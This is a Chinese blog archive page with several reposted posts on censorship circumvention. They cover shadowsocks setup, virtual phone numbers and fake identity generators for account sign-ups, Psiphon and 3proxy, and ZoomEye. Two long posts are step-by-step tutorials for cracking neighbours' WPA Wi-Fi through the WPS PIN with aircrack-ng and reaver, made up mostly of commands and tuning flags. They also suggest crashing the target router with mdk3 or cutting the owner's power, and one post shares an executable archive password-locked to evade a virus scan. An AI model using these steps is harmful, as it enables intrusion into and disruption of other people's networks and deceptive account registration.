搜索此博客

2017年1月9日星期一

樱花 Docker 免费高速翻墙教程

免费梯子不多,且用亲珍惜,以下为利用樱花 Docker 翻墙教程

一、注册账号

首先在 樱花 Docker 注册地址 注册一个账号

crate_account

填写邮箱、账户名、密码后点击确认

Fill_in_the_account

稍等片刻在邮箱中点击验证连接即可

Verify_the_mailbox
二、创建容器

注册号账号以后,登录控制台,点击 Create 创建容器

login

然后填写相关信息,如下

set_container

其中 Image 填写 mritd/shadowsocks,表示使用哪个镜像模板创建容器,关于 Docker 镜像含义等请自行 Google,mritd/shadowsocks 这个镜像是我维护的一个 shadowsocks 镜像,如果想使用其他 shadowsocks 可从 Docker Hub 上自行搜索

其他各选项含义如下:

    Instances: 启动多少个实例,一般 1 个就够用
    Memory: 容器使用的内存大小,256 也可以
    Endpoint: 暴露端口,可不填
    Port: 容器对外提供服务的端口,默认为 5000
    ENV: 是否使用环境变量,mritd/shadowsocks 镜像支持使用环境变量设置 shadowsocks 相关参数,这里可以省略
    CMD: 要执行容器中的命令,首部必须填写 /root/entrypoint.sh,后面其他参数可以省略,但是一般会加上 -k 设置 shadowsocks 的密码,关于都能用哪些参数和参数意义请看考 Docker Hub 上的说明(shadowsocks 默认加密方式为 aes-256-cfb)

最后点击创建即可

create_container
三、启动并连接

创建完成后会回到主页列表,在主页列表中可以看到刚刚创建的容器,此时容器还没有启动,点击启动按钮即可

start_container

创建时间稍稍有点长,此时列表中容器变为黄色,点击容器名称后可看到如下所示

create_detail

稍等片刻后容器变为绿色,并为 Running 状态表示创建完成

create_success

容器运行成功后会显示如下信息,其中包含了 shadowsocks 链接地址

ss_detail

最后使用客户端连接即可
四、高级扩展

樱花 Docker 提供了一个 CLI 命令行工具,可以通过相关 API Token 实现命令行下查询、创建 Docker 容器等操作,CLI 使用需要先创建 API Token,点击左侧按钮即可

crate_api_token

创建成功后将 Token 声明道环境变量中,并使用 CLI 工具即可实现命令行下创建 shadowsocks 镜像,关于 CLI 使用说明和下载地址请移步 Github 查看
五、其他说明

关于镜像使用在 Docker Hub 页面详细描述了镜像参数,具体可以参考一下

镜像可以理解为一个微型 Linux 系统,其中 CMD 选项代表要执行系统中的那个命令,填写 /root/entrypoint.sh 是因为制作镜像时指定了 shadowsocks 通过这个脚本启动,后面的 -k 等参数会被这个脚本执行,脚本支持哪些参数可以从上面的 Docker Hub 页面获取

镜像支持以环境变量的方式设置密码等,环境变量表现为一个 key-value (键值对) 形式,也就是说 CMD 其实可以只写 /root/entrypoint.sh 不加 -k 参数,而通过勾选 ENV 选项并添加一个 PASSWORD=Your-PassWord 环境变量来设置

目前镜像内集成了 kcptun,但是由于 kcptun 自定义设置需要挂载配置文件,所以在樱花 Docker 中还无法使用,后期准备支持环境变量设置 转载请注明出处,本文采用 CC4.0 协议授权

文章来源:https://goo.gl/1taoc0 作者:漠然

2016年4月21日星期四

翻墙注册必备-虚拟手机号码

 翻墙博客
再有在中共严查网络的今天,保护自己就变得非常重要了。翻墙注册国内的帐号,然后在国内网站狂草共匪,唤醒国人。这离不开VPN和接收注册验证码的免费国外电话号码。
现今的网络时代,每个人都应该保护好自己的个人资料不被泄露。而在平时一些网络账户注册时,除像电子邮箱、在线支付这些重要账户外,其它一般都不建议全部填写个人真实信息,因为你并不知道这些网站是否可以保障到你的个人资料安全。
另外平时上网活动也要注意这些问题,比如常见的网上留电子邮箱地址,这个就比较大意了,因为别人可以通过网络抓取工具获取这些信息,以用来滥发广告垃圾邮件。如果要留,最好做成图片形式再留。当然,以上只是一个简单举例,更多时候还是要靠我们平时有这个意识。
下面介绍两个应对注册问题的给力工具,一个是可以虚拟生成个人身份信息,第二个是可以在线接收手机验证码。
虚拟身份信息在线生成:http://www.fakenamegenerator.com/,可以生成详细身份信息,如姓名、地址、电话、职业、身高血型、社会证件号码等各种信息,并且生成的虚拟电邮地址是可用的,方便接收激活邮件临时使用。这个暂时不支持生成中国的身份证信息,不过网上这种身份证号码生成有很多,大家可以搜索一下。
方法一:
手机验证码在线接收:http://pinger.com/tfw/,这是一家提供免费短信服务的美国公司,随便用一个美国的区号就可以注册,如NEW YORK 的区号“10001”,用户注册一个帐号可以免费获取一个属于美国的手机号码,,登录后可以用来免费发送和接收短信。除了在线网页版外,这家公司还提供有Android、iPod、iPhone的相关应用,在应用上可以使用更多功能。
方法二:
Google Voice 早已不新鲜,但是它实在太好用,再次推广下。有时候某些美国网站或移动App要求注册时必须使用手机号接收验证码,于是广大非美帝人民就被硬生生挡在了外面。有 Google Voice 就好办了,这是 Google 提供的全功能虚拟美国手机号码服务,可以用它收发短信、拨打接听电话、接收语音邮件等。而且只要对方是美国或加拿大用户、那么不管是短信还是电话全部免费。当然它也能给美国/加拿大以外的用户打国际电话,而且费用超低,比如打到内地或香港只要2美分每分钟!(查看Google Voice国际电话收费标准)
可惜这么好的服务仅限美国或加拿大使用,要注册的话还是需要一定手段。几天前笔者刚好多注册了一个新号,但是当时没截图,抱歉只能用文字说明大致步骤。
第一步: 首先挂V,保证是美国/加拿大IP。
第二步: 访问Google Voice,使用Google账号登陆。
第三步: 要求填入美国手机号码进行验证。这是最关键也是最麻烦的一步了。你需要填入美国手机号码,然后Google Voice给你打电话,告诉你两位验证码。然后正确填写两位验证码才能通过这一步。可以到virtualphoneline注册个账号获得美国虚拟手机号。登录后访问 http://www.virtualphoneline.com/MyNumbers.php ,最左边的就是你的美国手机号,然后点击【Forwarded To】这一列,选择Google,填入Gmail 邮箱 地址。这样的话所有打到这个号码的电话都会转发到Google Talk上。除了Google,也可以转发到Skype、 MSN上。
方法三:
HeyWire 与 TextFree 是可以用来可获取真正美国手机号码与发国际短信的应用,相当于国内的飞信。(在我们购买只对美国人开放的东西的时候可以用!)在有些时候,我们需要通过手机短信验证身份,而服务商又不支持国内电话,这就大大方便了我们。
HeyWire
支持中文短信,本软件注册后会分配你一个美国的虚拟号码,此后发送短息到其它手机免费。(走GPRS/WIFI流量)
1、如果对方也安装了这个软件,发送和回复都是免费的。
2、如果对方没有安装这个软件,你发送免费,对方回复相当于回复到美国的手机,运营商收取费用1元/条。
3、接收方不必是你的好友(请不要用来发骚扰短信啊,引起问题后果自负啊)
4、国内可以发给移动比较好,发给联通、电信听说好像有点问题,大家自己测把。
软件说明HeyWire支持android,HeyWire支持免费给全球114个国家360家运营商发送短信,而且支持多种语言。
地纸:http://www.heywire.com/ lleida.net是 一家西班牙的电信公司,公司地址在业伊达,主要业务是国际网络短信服务。目前,lleida.net推出免费的短信虚拟号服务。这是一个可以发送短信,也 可以接收短信的电话号码,目前提供美国、英国、法国和西班牙四个国家的虚拟号码。lleida.net对新注册用户都免费赠送20点信用,可以用来发送免 费国际短信,显示的是你的虚拟号码,不过每个国家的费率不一样,发送的条数也不一样,lxvoip测试发送中国的费率是一条1.17,而发送到美国只需要 0.25。据凌霄电话论坛坛友反映,lleida.net接收到发送都很快。
注册也比较简单,打开lleida.net官方网站http://www.lleida.net/en/,点Virtual Numbers for SMS and MMS,填写你的申请资料就可以了,只要邮箱和手机号码正确就可以了,google voice和国内手机号码都可以申请,注册号码格式就可以了。提交之后,lleida.net会给你的手机发送短信验证码,通过验证之后,lleida.net再把帐号资料发送到你的邮箱。登录http://websms.lleida.net/就可以接收和发送短信了。
申请地址:www.lleida.net

来源:https://goo.gl/dkUZd6

2016年1月14日星期四

树莓派(raspberrypi)安装aircrack-ng,reaver及wifi破解教程[整理]

硬件环境

树莓派B+一个(我用的是debian环境)
PC一台(或其它设备直接操作PI就行)
无线网卡(能用就行,不过强大的无线网卡会事半功倍,我用的3070)

    Find注:

        无线网卡不是哪个都行,需要支持监听模式才可以,支持列表可以查看这里: https://wikidevi.com/wiki/Wireless_adapters/Chipset_table

安装依赖包

sudo apt-get install -y libpcap-dev libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tshark subversion ethtool
sudo apt-get install -y libnl-3-200 libnl-3-dev libnl-genl-3-dev libnl-genl-3-200

安装aircarck-ng

svn co http://svn.aircrack-ng.org/trunk/ aircrack-ng
cd aircrack-ng/
make
sudo make install
还提示了Run 'airodump-ng-oui-update' as root (or with sudo) to install or update Airodump-ng OUI file (Internet connection required).
sudo airodump-ng-oui-update

安装reaver

wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
tar zxvf reaver-1.4.tar.gz
cd reaver-1.4/src
./configure
make
sudo make install

以上两个资源包都可以在这里找到:
百度网盘分享

如果安装成功后,会有airmon-ng,airodump-ng,reaver等命令可用。
破解教程

sudo airmon-ng start wlan0
sudo airodump-ng mon0

根据上面的airodump搜索到的无线信号,然后可以挑信号强的进行破解(注意,要选择开了WPS功能的)
注意看这张列表,列表中显示了你周边无线的相关信息。注意看 MB 这一列,显示为” 54 “、”54e. “等等,这表示了无线当前的速率模式以及WPS开启状况,我自己的路由器是 “steve”,注意看,”54e“和” 54e. “是不同的,多了一个 点,这个点表示开启了 wps模式。所以我们下面就进行wps的探测,在这里我们要记住SSID对应的MAC地址,此后我们会针对MAC地址进行攻击和探测。

sudo reaver -i mon0 -b 00:00:00:00:00:00 -a -S -vv -d2 -t 5 -c 11

-vv 是查看详细信息的,等你熟练了之后,你就可以使用 -v ,这样就简单了。通常,遇到问题才会使用 -vv 。
如果想挂机破解,记得加上nohup命令后,可以断开ssh。然后剩下就是等待。

nohup sudo reaver -i mon0 -b 00:00:00:00:00:00 -a -S -vv -d2 -t 5 -c 11 -o fbi &

-o参数是输出到文件
如果破解成功后,打开输出的日志,就可以看到reaver出来的密码。
命令说明:
reaver
使用方法:

airmon-ng start wlan0 //启动mon0监控
reaver -i mon0 -b MAC -a -S -vv //普通用法
如果,90.9%进程后死机或停机,请记下PIN前四位数,用指令:

reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位数)
其他命令

airodump-ng mon0 用来扫描周围无线信号
wash -i mon0 -C 这个是用来检测周围无线支持PIN的路由
如果一直pin不动,尝试加-N参数

reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S -N
也可以加延时 -t 3 -b 3
常用参数释疑

-i 监听后接口名称 网卡的监视接口,通常是mon0
-b 目标mac地址 AP的MAC地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key,可以提高PJ速度
-vv 显示更多的非严重警告
-d 即delay每穷举一次的闲置时间 预设为1秒
reaver -i mon0 -b MAC -d 0
用上述指令可以大幅加快PJ速度 但是有些AP可能受不了
-c (后跟频道数) 指定频道,可以方便找到信号
-p PIN码四位或八位 //已知pin码前4位可以带此参数,指定从这个数字开始pin。可以用8位直接找到密码。
-N 不发送NACK信息(如果一直pin不动,可以尝试这个参数)
-n 对目标AP总是发送NACK,默认自动
-t 即timeout每次穷举等待反馈的最长时间,如果信号不错,可以这样###设置
reaver -i mon0 -b MAC -d 0 -t .5
-m, –mac= 指定本机MAC地址,在AP有MAC过滤的时候需要使用
小结-PJ时应因状况调整参数:

信号非常好:
reaver -i mon0 -b MAC -a -S -vv -d 0 -c 1
信号普通:
reaver -i mon0 -b MAC -a -S -vv -d .5 -t .5 -c 1
信号一般:
reaver -i mon0 -b MAC -a -S -vv -c 1

当出现有百分数时你就可以用crtl+c来暂停,它会将reaver的进度表文件保存在
1.3版:
/etc/reaver/MAC地址.wpc
1.4版:
/usr/local/etc/reaver/MAC地址.wpc
用资源管理器,手工将以MAC地址命名的、后辍为wpc的文件拷贝到U盘或硬盘中,
下次重启动后,再手工复制到/etc/reaver/ 目录下即可。

不是所有的路由都支持pin学习。AP关闭了WPS、或者没有QSS滴,会出现
WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
学习过程中也可随时随地按Ctrl+C终止PJ,重复同一个PIN码 或 timeou t可终止,reaver会自动保存进度。
继续上次的PJ,则再次在终端中发送:
reaver -i mon0 -b MAC -vv
这条指令下达后,会让你选y或n,选y后就继续了
当reaver确定前4位PIN密码后,其工作完成任务进度数值将直接跳跃至90.9%以上,也就是说只剩余一千个密码组合了(总共一万一千个密码)。

参数详细说明:
-m, –mac= MAC of the host system
指定本机MAC地址,在AP有MAC过滤的时候需要使用
-e, –essid= ESSID of the target AP
路由器的ESSID,一般不用指定
-c, –channel= Set the 802.11 channel for the interface (implies -f)
信号的频道,如果不指定会自动扫描
-o, –out-file= Send output to a log file [stdout]
标准输出到文件
-s, –session= Restore a previous session file
恢复进程文件
-C, –exec= Execute the supplied command upon successful pin recovery
pin成功后执行命令
-D, –daemonize Daemonize reaver
设置reaver成Daemon
-a, –auto Auto detect the best advanced options for the target AP
对目标AP自动检测高级参数
-f, –fixed Disable channel hopping
禁止频道跳转
-5, –5ghz Use 5GHz 802.11 channels
使用5G频道
-v, –verbose Display non-critical warnings (-vv for more)
显示不重要警告信息 -vv 可以显示更多
-q, –quiet Only display critical messages
只显示关键信息
-h, –help Show help
显示帮助

-vv 显示更多的非严重警告

高级参数:
-p, –pin= Use the specified 4 or 8 digit WPS pin
直接读取psk(本人测试未成功,建议用网卡自带软件获取)
-d, –delay= Set the delay between pin attempts 1
pin间延时,默认1秒,推荐设0
-l, –lock-delay= Set the time to wait if the AP locks WPS pin attempts [60]
AP锁定WPS后等待时间
-g, –max-attempts= Quit after num pin attempts
最大pin次数
-x, –fail-wait= Set the time to sleep after 10 unexpected failures [0]
10次意外失败后等待时间,默认0秒
-r, –recurring-delay= Sleep for y seconds every x pin attempts
每x次pin后等待y秒
-t, –timeout= Set the receive timeout period [5]
收包超时,默认5秒
-T, –m57-timeout= Set the M5/M7 timeout period [0.20]
M5/M7超时,默认0.2秒
-A, –no-associate Do not associate with the AP (association must be done by another application)
不连入AP(连入过程必须有其他程序完成)
-N, –no-nacks Do not send NACK messages when out of order packets are received
不发送NACK信息(如果一直pin不动,可以尝试这个参数)
-S, –dh-small Use small DH keys to improve crack speed
使用小DH关键值提高速度(推荐使用)
-L, –ignore-locks Ignore locked state reported by the target AP
忽略目标AP报告的锁定状态
-E, –eap-terminate Terminate each WPS session with an EAP FAIL packet
每当收到EAP失败包就终止WPS进程
-n, –nack Target AP always sends a NACK [Auto]
对目标AP总是发送NACK,默认自动
-w, –win7 Mimic a Windows 7 registrar [False]
模拟win7注册,默认关闭
Reference

http://lok.me/a/1972.html
http://bao3.blogspot.com/2013/05/raspberry-pi.html
http://tieba.baidu.com/p/2682878857
http://www.nyaboron.moe/posts/606.html

文章来源: http://goo.gl/dkeJbH

使用reaver破解WPA加密的WiFi网络

我们经常可以在无线路由器的宣传中看到这样的内容:


传统的破解WPA加密的方式是抓到足够多的cap包,然后用字典进行暴力猜解。但前提是必须要有一个足以包含世界上所有奇奇怪怪的密码的强大字典。之后 WPS(WiFi Protected setup)的出现使得设置无线加密更加便利,但事实上,它给破解WiFi密码提供了一个新的思路。如果目标路由器标有“可使用WPS”等字样,那么恭喜,你可以使用本文所述的方法进行破解。P.s.网传目前被破的主要是TP-LINK的路由器,你可以在【这里】通过BSSID查到目标路由的制造商。
本文所述的环境虽然是树莓派,但是如果你使用一台普通的Linux PC,这篇教程同样适用,但是在某些命令上会有些差别。
本文所述内容仅用于研究网络安全相关内容,入侵他人局域网络是违法行为!
准备工作
硬件

    树莓派一台(raspbian wheezy)
    TPLINK无线网卡(芯片为ath9k,用于破解)
    一个强劲的电源以及有源USB HUB
    散热设备(如果需要)

我把全套装备都塞进一个盒子里,在家的时候放在书柜顶上插着电运行,出门的时候放在包里走到哪黑到哪,闷声作大死的必备神器。

软件

    aircrack及其依赖
    reaver及其依赖
    macchanger(用于伪造MAC地址,可选)
    sshd(raspbian自带)
    相关驱动及编译环境
    screen (用于使ssh中运行的进程不随ssh连接断开而被终止)

环境配置

    安装一大堆软件包:

sudo apt-get install -y libpcap-dev libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tshark subversion screen
1
   
sudo apt-get install -y libpcap-dev libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tshark subversion screen

    编译安装aircrack:

svn co http://trac.aircrack-ng.org/svn/trunk aircrack-ng
(P.s. 如果这一步不成功,你可以在【这里】下载并tar解压)
cd aircrack-ng/
make
sudo make install
1
2
3
4
5
   
svn co http://trac.aircrack-ng.org/svn/trunk aircrack-ng
(P.s. 如果这一步不成功,你可以在【这里】下载并tar解压)
cd aircrack-ng/
make
sudo make install

     编译安装reaver

wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
tar zxvf reaver-1.4.tar.gz
cd reaver-1.4/src
./configure
make
sudo make install
1
2
3
4
5
6
   
wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
tar zxvf reaver-1.4.tar.gz
cd reaver-1.4/src
./configure
make
sudo make install


搜寻目标AP
启动网卡监听模式

(由于在RPi上实机运行时没有截图,以下的截图是在Linux Mint16 虚拟机中截得,反正都基于Debian,大同小异。)

    查看网卡是否被识别

sudo lsusb
1
   
sudo lsusb

     查看驱动是否正确加载

sudo lsmod
1
   
sudo lsmod



    查看自己的网卡是哪个接口(interface)并将其bring up,我的是wlan0。

sudo ifconfig
sudo ifconfig wlan0 up
1
2
   
sudo ifconfig
sudo ifconfig wlan0 up

    在wlan0启动监听模式,然后系统会给你回显监听模式在哪个接口上被启动了(通常是mon0)

sudo airmon-ng start wlan0
1
   
sudo airmon-ng start wlan0




获取目标AP信息并确认其支持WPS

    开始抓包

sudo airodump-ng mon0
1
   
sudo airodump-ng mon0


这时候你需要把网卡摆到最佳的位置(但是不建议使用延长线),让PWR(信号强度)尽可能地高,记住BSSID和CH栏显示的数字(信道),然后按Ctrl+c终止。
还有最重要的,你需要确定目标路由器支持WPS 。怎么来确定呢?如果你的系统中有WASH或wlash,你可以使用它们,如果没有,你只需要打开Android手机中的WLAN,手机上会显示目标路由是否支持WPS。

【更新:上图中的MB一栏显示的内容,官方文档是这么解释的:

MB :Maximum speed supported by the AP. If MB = 11, it’s 802.11b, if MB = 22 it’s 802.11b+ and higher rates are 802.11g. The dot (after 54 above) indicates short preamble is supported. Displays “e” following the MB speed value if the network has QoS enabled.

AP支持的最高速率。如果值为11,则AP为802.11b标准;如果值为22则是802.11b+,更高的是802.11g标准。后面的点代表支持短序文(short preamble)(我的理解是验证pin时先验证前四位?我也不清楚….)。e代表路由器开启了QoS(因为貌似只有802.11n支持QoS,所以基本可以确定是802.11n标准)

所以按我的理解就是:攻击带有.和e的路由器成功率更高?…我也是猜的,如果你知道明确的答案请告诉我 (>^ω^<)】

一切准备停当之后,就可以祭出神器reaver了
使用适当的参数启动reaver

注意:如果你使用ssh的话,请在screen中运行reaver。
sudo reaver -i mon0 -b A8:15:XX:XX:XX:XX -a -S -vv -c 1
1
   
sudo reaver -i mon0 -b A8:15:XX:XX:XX:XX -a -S -vv -c 1

(-b后面换成你的目标路由的BSSID )(-i 后面换成监听模式运行的接口)(-c后面换成目标使用的信道)

(这是我使用的参数,你可以根据实际情况进行调整,尤其是目标的信号强度一般的情况下,请务必去掉-S 参数,并在-d和-t参数中设置较长的延时)
各项参数

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:必填参数
-i, –interface=<wlan> Name of the monitor-mode interface to use–网卡接口名称
-b, –bssid=<mac> BSSID of the target AP– 目标mac地址

Optional Arguments:附加参数
-m, –mac=<mac> MAC of the host system–主机的MAC地址
-e, –essid=<ssid> ESSID of the target AP –目标的ESSID
-c, –channel=<channel> Set the 802.11 channel for the interface (implies -f) –设置信道(与刚才的目标的CH值相同)
-o, –out-file=<file> Send output to a log file [stdout] –输出到文件
-s, –session=<file> Restore a previous session file –重载之前的存档
-C, –exec=<command> Execute the supplied command upon successful pin recovery –当成功破解之后执行某个命令
-D, –daemonize Daemonize reaver –让reaver作为守护进程
-a, –auto Auto detect the best advanced options for the target AP –自动针对目标选择最佳的配置
-f, –fixed Disable channel hopping –不懂
-5, –5ghz Use 5GHz 802.11 channels –使用5G频段
-v, –verbose Display non-critical warnings (-vv for more) –显示不重要的警告(使用-vv显示更多)(看清楚是两个v不是w)
-q, –quiet Only display critical messages –只显示重要的警告
-h, –help Show help –显示帮助

Advanced Options:高级参数
-p, –pin=<wps pin> Use the specified 4 or 8 digit WPS pin –如果你知道了前4位的pin或完整的pin,使用这个参数直接解出psk
-d, –delay=<seconds> Set the delay between pin attempts [1] –在两次尝试间的延时(单位秒,默认为1)
-l, –lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60] –当目标被锁定或限速的延时(单位秒,默认60)
-g, –max-attempts=<num> Quit after num pin attempts –最大尝试的数量
-x, –fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0] –在10个未预期的错误后的延时(默认0)
-r, –recurring-delay=<x:y> Sleep for y seconds every x pin attempts –在x次尝试之后暂停y秒钟
-t, –timeout=<seconds> Set the receive timeout period [5] –接受数据包的超时时间(默认10)
-T, –m57-timeout=<seconds> Set the M5/M7 timeout period [0.20] –接受M5/M7数据包的超时时间(默认20)
-A, –no-associate Do not associate with the AP (association must be done by another application) –使reaver不与目标AP关联( associate),但必须已经有其他的程序与目标关联
-N, –no-nacks Do not send NACK messages when out of order packets are received –不懂
-S, –dh-small Use small DH keys to improve crack speed –使用小的DH key,提高速度
-L, –ignore-locks Ignore locked state reported by the target AP –怒略目标的锁定状态
-E, –eap-terminate Terminate each WPS session with an EAP FAIL packet –当出现EAP FAIL 数据包时终止WPS 会话。
-n, –nack Target AP always sends a NACK [Auto] –不懂
-w, –win7 Mimic a Windows 7 registrar [False] –还是不懂

Example:
reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv


然后就是漫长的等待……(在运行中你可以随时按ctrl+c终止reaver,它会自动保存当前进度,下次你输入同一个BSSID时reaver会自动加载上一次保存的进度)
…………………………
…………………………
…………………………
在等待的时间里我们来了解下reaver的工作原理。它利用了WiFi保护设置(WiFi Protected Setup 也就是WPS)的一个弱点,WPS可以为用户提供简单的配置过程,它与设备中硬编码保存的一个PIN码绑定在一起。Reaver利用的就是PIN码认证的一个缺陷。因此只要有足够的时间,它就能破解WPA或WPA2的密码。PIN码分前4和后4,先猜解前4位,只有一万个组合,再猜解后4位中的前3位,只有一千个组合,一共就是一万一千个密码组合。 当reaver确定前4位PIN后,进度将直接跳至90.9%。猜解出整个8位数字的pin之后,就可以直接得到psk。

【更新:如果你想了解更多,请参考 这个网页 和 这个】

破解的速度取决于信号强度以及目标路由器的安全设置,还有信道的拥挤程度。官方文档说reaver通常会运行4-10小时来解出pin,但实际上我在信号满格(同一位置,手机上)的情况下运行了一天一夜+大半天。
成功

当进度达到100%时,你会得到一个大礼包,也就是如下的画面,其中的WPA-PSK就是密码。
(这是在RPi实机运行时用VNC截的图)

故障排除

reaver会根据目标的当前状态来调整猜解的速度和配置,所以在过程中并不需要一直盯着它的运行状态,但是你也还是需要时不时地看一下,确保reaver没有报错或卡死
报错

    出现failed to associate with XX:XX:XX:XX:XX:XX ,说明目标路由器不支持WPS。
    出现failed to re-initialize interface mon0,这有可能是你的网卡掉线造成的,把网卡重新插上并从头执行所有指令。【尤其是在使用树莓派的时候,当你遇到这个报错,检查你的电源和USB HUB的供电,我的两次掉线都是由这个引起的】
    其他报错,比如我有一次遇到了Segmentation Fault…….原因及解决方法未知…..

卡死

如果运行到一定进度,发现窗口中显示的PIN码不变,进度也不走,那么恭喜你遇上死循环了。

    遇到卡死,如果进度不是在90%或者99%,首先尝试Ctrl+c并重新输入刚才的命令,如果程序继续运行,那么故障排除;如果没有,我也不知道怎么办。
    如果卡在90%的位置,说明前四位已解出,使用下面的命令

sudo reaver -i mon0 -b MAC -p 【前四位】 -其他参数
1
   
sudo reaver -i mon0 -b MAC -p 【前四位】 -其他参数

    如果卡死在99.99%,查看/etc/reaver/【目标MAC】.wpc文件,找出剩余的那个PIN(8位的完整pin),使用

sudo reaver -i mon0 -b MAC -p【8位数】
1
   
sudo reaver -i mon0 -b MAC -p【8位数】

如果一切正常可以直接显示结果。

    如果没有显示结果仍然卡死,那么可能是漏掉了正确的PIN码,使用

sudo reaver -i mon0 -b MAC -p 【前四位】 -其他参数
1
   
sudo reaver -i mon0 -b MAC -p 【前四位】 -其他参数

重跑后三位;如果仍然卡死,问题可能出现在前四位,只能删掉存档重新运行reaver,有必要的话设置参数把速度降下来。
还有一种情况

(本段来自网络,未亲测)
破密正常运行中,信号质量也很好的情况下,突然出现出现同码循环和大量timeout,可能是如下原因造成的(排除关机状态)。
reaver只支持11N的PIN破密,11n先验证前4位码,11g也有PIN功能,是全码验证。
现在多数AP的无线模式是混和11bgn,当有11g设备接入时,AP自动从11N降至11g,此时,reaver会出现同码循环重复timeout! 甚至会出现WARNING: Failed to associate with。实证中,在排除同频干扰因素后,通过扫描无线
网络,发现路由器,确实从54e.模式降为54.模式了。有人把此种现象称为临时性WPS、PIN功能自锁。

解决办法:

    等待11g设备退出无线接入,断电重启。
    使用mdk3向路由器发起攻击使其死机,迫使路由器主人重启。
    终极大招:找到目标所在的人家,拉电闸再推上去。

文章来源:http://goo.gl/xHg1oU

2015年7月30日星期四

黑科技之无障碍访问 Google


网络上有很多黑科技、冷知识,我这儿给大家分享个,和 ZoomEye 这个网络空间搜索引擎有关,我们的工程师提醒我的,原来我们爬了全球开放服务器,无意中也把 Google 相关服务器都识别存储下来了。

于是乎,现在访问 Google,可以不用翻墙了。姿势如下:

1、打开 http://zoomeye.org
2、输入:gws,得到:

3、上图的搜索结果得到的是全球 Google Web 相关服务器,点击红色圈里的小图标打开新窗口就是熟悉的 Google 了
4、你懂

提示:
1、这个搜索引擎是:ZoomEye | 钟馗之眼 - 网络空间搜索引擎
2、搜索结果每天会更新
3、不是所有的 gws 结果都可以顺畅使用,多点击几个试试
4、搜索结果页左边有个 Country 过滤器,可以过滤属于某个国家的 gws 结果,方便使用
5、多玩多总结,你可以发现更多有趣的 :)

对了,再给大家一张图,一图看懂 Google 相关服务器的全球分布情况,你看懂了吗:


这图可以在这看到:
http://www.zoomeye.org/vision/map/gws

有人担心我们这样公布,这些 Google IP 会被伟大的墙批量屏蔽,不怕...如果因此而真的带来什么影响,我们还有更黑科技。

最后强调下:这种方式拿来应急使用就好,真想把 Google 所有服务都无障碍使用,那复杂度就高很多了,这批 Google IP 对于一些极客来说还是很有用的,用的爽不爽看你。

2015年7月26日星期日

用3proxy 给Psiphon (赛风) 加速获得更加畅快的浏览体验

3proxyPsiphon (赛风) 加速获得更加畅快的浏览体验来源于google code
3prox的目的是让赛风只能使用 Akamai CDN 服务,并且找到与你本地连接速度快的服务器,这样通过赛风上网,浏览网页、看视频、下载文件等,达到最高网速也不是什么不可能的事情了。

1、下载 warmingf...@gmail.com 已经做好基本设置的 3proxy 软件
https://copy.com/pU0aZGd0oBsAigwS/3proxy.7z
(注意压缩包加密了,否则copy.com会报有病毒不让分享,解压密码:goagent
我在MEGA网盘上也传了一份,压缩包未加密:
https://mega.co.nz/#!QloC1LLL!8RAcPdwMOGH0SfpBW_De2yoXVYn8-FVE98OIDb5VctE
2. 解压,编辑 config.txt 这个文件以修改其中的 Akamai IP 地址为在你的网络环境下表现好的 IP 地址,不修改默认是 210.0.156.15
3. 打开 3proxyLauncher.exe (修改自 Phus Lu 的开源 goagent.exe
4. 打开赛风,做如下操作


5. 关闭赛风,重新打开赛风
最后,如果你选用的香港服务器IP,建议在赛风里将服务器改成:Singapore(新加坡),速度会更快点

6、获得Akamai CDN 服务 IP
##赛风Akamai CDN 服务
#        alchzwwfzmrtgoaf-a.akamaihd.net
#        jkiysqntxacscicm-a.akamaihd.net
#        prfzquobemaspprl-a.akamaihd.net
#        yryirjrhqffsxwpg-a.akamaihd.net

方法1、打开  https://tools.keycdn.com/ping 输入上面地址可以获得快的Akamai地址。


方法2、用nslookup 命令 获得快的Akamai地址
    如:nslookup alchzwwfzmrtgoaf-a.akamaihd.net (新加坡、香港、日本DNS服务器)

2015年3月27日星期五

Shadowsocks使用高级教程



我也是搬来的这是这篇教程的出处41
首先你需要一个Shadowsocks帐号,这是根本的啦,
然后你要有一台电脑,安装了windows系统,下载下面的软件就可以了。
win7,xp,vista可以从这里下载:
http://dwz.cn/wNTXN19
Win8,Win8.1可以从这里下载:
http://dwz.cn/wNU3F21
下载完成后,解压:
就一个文件,很简单:

双击这个文件,然后在你的任务栏右下角就会有个白色的小飞机。
注意看任务栏右下角,不用一直双击,要不会打开很多个。

右击,然后选择Servers --Edit Servers.如图:

编辑你的Shadowsocks帐号信息:

其中 Server Ip 输入Shadowsocks帐号服务器的ip/域名。
Server Port 输入Shadowsocks帐号的远程端口号。
Password 输入Shadowsocks帐号的密码。
Encryption 是你的Shadowsocks帐号的加密方式,记得选择正确。
其他默认即可。
然后点击OK。
这样就会在本地的1080端口建立起了Socks5代理。
可以使用firefox或者Chrome等支持Socks5代理的浏览器访问国外网站了。
但是我们这里说的是高级教程。
上述设置后同时会在本地的8123端口建立个HTTP代理。
QQ想用代理怎么办?旺旺想用代理怎么办?
很简单,他们都是支持HTTP代理的,只需这样简单设置就可以了。
如下截图:
这是qq的

这是旺旺的:

等等,这里只是简单的举个例子,很多软件都支持HTTP代理,具体可以自己看看软件的使用说明就可以了。
还有 IE浏览器。
这个在工具-Indernet选项-连接这里

如果你使用的是拨号连接,就点击上面的设置,如果你使用的路由器上网,那么就点击下面的局域网设置,我使用的是路由器上网,所以我点击下面的局域网设置:
如图:
如果你想所有的网站都通过Shadowsocks代理访问:
那么这样设置:

如果你只想被和谐的网站使用Shadowsocks代理的话那么这样设置就可以了。

就是此软件会在你本地的8090端口自动建立一个pac文件。
pac文件的地址就是:http://127.0.0.1:8090/pac
如果你使用火狐或者Chrome的话也可以使用上面的方法使用Shadowsocks代理,而不用在去安装相应的插件。
使用方法跟这个类似的了。自己研究下就可以了。
